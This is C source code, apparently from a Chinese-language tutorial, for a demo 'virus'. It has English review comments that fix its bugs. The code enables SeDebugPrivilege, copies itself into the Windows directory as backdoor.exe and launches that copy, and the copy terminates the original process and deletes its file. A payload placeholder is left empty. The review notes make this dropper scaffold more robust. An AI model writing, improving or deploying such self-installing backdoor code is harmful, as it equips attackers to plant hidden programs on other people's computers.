// 调整权限：为当前进程启用 SeDebugPrivilege
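/*
 * Enable SeDebugPrivilege on the current process token, so that the
 * OpenProcess/TerminateProcess calls in CloseProcess() can reach processes
 * that the caller would otherwise not be allowed to open.
 *
 * Returns TRUE only when the privilege was actually enabled, FALSE on any
 * failure. Callers that ignore the result keep working exactly as before.
 *
 * Review notes on the original:
 *  - it asked for TOKEN_ALL_ACCESS; adjusting privileges only needs
 *    TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY (least privilege);
 *  - LookupPrivilegeValue() and AdjustTokenPrivileges() were unchecked, and
 *    AdjustTokenPrivileges() returns TRUE even when the token does not hold
 *    the privilege (GetLastError() == ERROR_NOT_ALL_ASSIGNED, the normal case
 *    for a non-administrator token), so "success" meant nothing;
 *  - comparing a BOOL with == TRUE is fragile; any non-zero value is true.
 */
BOOL DebugPrivilege(void)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    BOOL bEnabled = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return FALSE;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)) {
        /* A TRUE return is not sufficient: the call also "succeeds" when the
         * privilege is simply not present in the token. */
        bEnabled = (GetLastError() != ERROR_NOT_ALL_ASSIGNED);
    }

    CloseHandle(hToken);
    return bEnabled;
}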
?
// 获得某进程的 PID（按映像文件名查找，未找到返回 0）
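/*
 * Return the PID of the first running process whose image name equals
 * szProcessName (e.g. "backdoor.exe"), or 0 when no such process exists,
 * when szProcessName is NULL, or when the process snapshot cannot be taken.
 *
 * Review notes on the original:
 *  - it returned pe32.th32ProcessID unconditionally, so when the name was
 *    NOT found it returned the PID of the LAST process in the enumeration,
 *    and the caller (CloseProcess) would then terminate an unrelated
 *    process. This version returns 0 in that case;
 *  - the snapshot handle was never closed (handle leak) and the
 *    INVALID_HANDLE_VALUE failure return was not checked;
 *  - the comparison is strcmp(), i.e. case-sensitive, although Windows
 *    image names are not; that is kept as-is, so callers must pass the name
 *    exactly as the OS reports it;
 *  - NOTE(review): the name collides with the Win32 API GetProcessId(HANDLE)
 *    declared by <windows.h> on SDKs that provide it; renaming would fix the
 *    conflict but changes the interface, so it is only flagged here.
 */
DWORD GetProcessId(char *szProcessName)
{
    PROCESSENTRY32 pe32 = { 0 };
    DWORD dwPid = 0;
    HANDLE hSnap;

    if (szProcessName == NULL) {
        return 0;
    }

    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    /* This API signals failure with INVALID_HANDLE_VALUE, not NULL. */
    if (hSnap == INVALID_HANDLE_VALUE) {
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hSnap, &pe32)) {
        do {
            if (strcmp(pe32.szExeFile, szProcessName) == 0) {
                dwPid = pe32.th32ProcessID;   /* only set on a real match */
                break;
            }
        } while (Process32Next(hSnap, &pe32));
    }

    CloseHandle(hSnap);
    return dwPid;
}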
?
// 结束某进程（按 PID 终止）
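/*
 * Terminate the process identified by dwPid. Failures are not reported,
 * matching the original interface.
 *
 * Review notes on the original:
 *  - OpenProcess() was unchecked, so on failure TerminateProcess(NULL) and
 *    CloseHandle(NULL) were called;
 *  - PROCESS_ALL_ACCESS was requested although only PROCESS_TERMINATE is
 *    needed; the broader mask is more likely to be denied and is the wrong
 *    default from a least-privilege standpoint;
 *  - dwPid == 0 is what GetProcessId() returns for "not found"; it is
 *    rejected up front instead of being handed to OpenProcess().
 */
VOID CloseProcess(DWORD dwPid)
{
    HANDLE hProcess;

    if (dwPid == 0) {
        return;
    }

    hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, dwPid);
    if (hProcess == NULL) {
        return;
    }

    TerminateProcess(hProcess, 0);
    CloseHandle(hProcess);
}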
?
这几个函数完成后,我们就来根据前面描述的流程完成病毒的主体代码,代码如下:
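/*
 * Entry point of the demo "virus" from the article.
 *
 * Flow (unchanged):
 *   - first run, i.e. this binary is NOT in the Windows directory: copy
 *     itself to %WINDIR%\backdoor.exe, start that copy with our own full
 *     path as argv[1], then wait for a keypress;
 *   - run from the Windows directory with one argument: terminate the
 *     process whose image name is the basename of argv[1], then delete the
 *     file argv[1] (the original copy);
 *   - run from the Windows directory with no argument (autostart case):
 *     placeholder for the payload.
 *
 * Security caveat: argv[1] is used verbatim. Any local user who can run the
 * installed copy can pass an arbitrary path and have this process terminate
 * a process by that name and delete that file, with whatever rights this
 * process holds. The directory comparison is strcmp(), i.e. case-sensitive,
 * although Windows paths are not; that original behaviour is kept.
 *
 * Fixes versus the original:
 *  - strrchr() results are NULL-checked (the original did strlen(NULL) and
 *    pFileName++ on NULL when the path had no backslash);
 *  - the command line is built with snprintf() into a buffer that holds two
 *    MAX_PATH strings instead of strcat() into a MAX_PATH buffer, which could
 *    overflow the stack;
 *  - CopyFile() is checked before the copy is launched;
 *  - a PID of 0 (not found) is not passed to CloseProcess();
 *  - the string terminator is '\0' rather than the pointer constant NULL, and
 *    the DWORD is printed with %lu instead of %d.
 */
int main(int argc, char **argv)
{
    char szWinDir[MAX_PATH] = { 0 };   /* Windows directory */
    char szCurrDir[MAX_PATH] = { 0 };  /* directory of this executable */
    char *pFileName;

    GetWindowsDirectory(szWinDir, MAX_PATH);
    GetModuleFileName(NULL, szCurrDir, MAX_PATH);

    /* Strip the file name: everything from the last backslash onwards. */
    pFileName = strrchr(szCurrDir, '\\');
    if (pFileName != NULL) {
        *pFileName = '\0';
    }

    if (strcmp(szWinDir, szCurrDir) == 0) {
        /* Same directory: we are the installed copy. One argument means the
         * original started us and wants to be removed; an autostart launch
         * carries no argument. */
        printf("argc = %d\r\n", argc);
        if (argc == 2) {
            DWORD dwPid;

            /* Basename of argv[1]; the whole string if it has no backslash. */
            pFileName = strrchr(argv[1], '\\');
            pFileName = (pFileName != NULL) ? pFileName + 1 : argv[1];
            printf("pFileName = %s \r\n", pFileName);

            dwPid = GetProcessId(pFileName);
            printf("dwPid= %lu \r\n", (unsigned long)dwPid);
            if (dwPid != 0) {
                DebugPrivilege();
                CloseProcess(dwPid);
            }

            pFileName = argv[1];
            printf("pFileName = %s \r\n", pFileName);
            Sleep(3000);   /* let the original process exit before deleting its file */
            DeleteFile(pFileName);
        } else {
            /* payload placeholder */
        }
    } else {
        /* Different directory: first run. Install a copy under the Windows
         * directory and hand it our own path so it can clean us up. */
        char szTarget[MAX_PATH];
        char szCmdLine[2 * MAX_PATH + 4];   /* "<target> \"<self>\"" */
        int n;

        GetModuleFileName(NULL, szCurrDir, MAX_PATH);   /* full path again */

        n = snprintf(szTarget, sizeof szTarget, "%s\\backdoor.exe", szWinDir);
        if (n > 0 && (size_t)n < sizeof szTarget &&
            CopyFile(szCurrDir, szTarget, FALSE)) {
            n = snprintf(szCmdLine, sizeof szCmdLine, "%s \"%s\"",
                         szTarget, szCurrDir);
            if (n > 0 && (size_t)n < sizeof szCmdLine) {
                printf("%s\r\n", szCmdLine);
                /* WinExec is a legacy API; CreateProcess would return a
                 * handle and a real error status. Kept for fidelity. */
                WinExec(szCmdLine, SW_SHOW);
                Sleep(1000);
            }
        }
    }

    /* getch() stands in for the payload and keeps the process alive. */
    getch();
    return 0;
}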
